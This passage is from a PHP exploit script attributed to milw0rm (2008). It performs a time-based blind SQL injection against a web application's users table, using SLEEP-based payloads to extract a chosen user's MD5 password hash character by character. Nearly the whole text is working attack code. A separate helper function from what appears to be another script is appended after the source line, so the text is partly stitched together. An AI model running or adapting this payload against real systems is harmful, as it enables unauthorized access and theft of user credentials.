die("\n[-] Login failed!\n");
}
}
$user = getusername($uid);
print "\n[-] Username: {$user}";
$hash = array(0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102);
$index = 1;
$md5 = "";
print "\n[-] MD5 Hash: ";
while (!strpos($md5, chr(0))) {
for ($i = 0, $n = count($hash); $i <= $n; $i++) {
if ($i == $n) {
die("\n\n[-] Exploit failed...\n");
}
$sql = "'OR(SELECT IF(ORD(SUBSTR(user_password,{$index},1))={$hash[$i]},SLEEP({$count}),1) FROM {$prefix}_users WHERE user_id={$uid})#";
if (getdelay($sql) >= $count * 1000) {
$md5 .= chr($hash[$i]);
print chr($hash[$i]);
break;
}
}
$index++;
}
if (!eregi("[0-9,a-f]{32}", $md5)) {
print "\n\n[-] Invalid MD5 hash...\n";
} else {
print "\n\n[-] Successfull!\n";
}
?>
# milw0rm.com [2008-05-19]
function check_query($query)
{
global $ndelay;
$ret = false;
$d = intval(getdelay($query));
if ($d > $ndelay * 2) {
$ret = true;
}
return $ret;
}
